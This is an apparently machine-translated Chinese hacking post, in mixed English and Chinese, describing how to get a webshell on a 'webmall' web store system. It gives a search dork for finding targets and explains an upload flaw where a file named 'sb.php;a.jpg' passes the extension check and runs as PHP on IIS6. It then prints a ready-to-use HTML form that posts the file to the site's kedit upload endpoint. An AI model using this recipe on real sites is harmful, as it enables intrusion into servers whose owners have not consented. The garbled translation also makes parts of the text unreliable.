Keywords: inurl:webmall/detail. php? id
Data table: pwn_base_admin
About to get shell
首先 登录 后台 admin.php
See the upload. php source code analysis for an afternoon, and then about understand that although the upload where only allowed to upload gif,jpg,png,bmp four types of files, but not the file name limit.
In other words, sb.php;a. jpg so the file is also allowed, as long as the server is IIS6 take to webshel, the 低 版本 的 apache 可以 试着 重 命名 为 sb.php.jpg
Then engage over only to find that here more than my leaner, my ass, and worship under three stone, and then just borrow it, I began and his like Is to take all of the source code, and then found a more streamlined
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
<input type="text" name="fileName" value="sb.php;a.jpg" />
<input type="hidden" name="attachPath" value="news/pics/" />
<input type="file" name="fileData" size="1 4" /></td>
<input type="submit" name="button" value="OK" />
First log on the background, 然后把上面的文件保存为xx.html modify action, and then re-upload, if it is iis6 on in uploaded View Source just fine.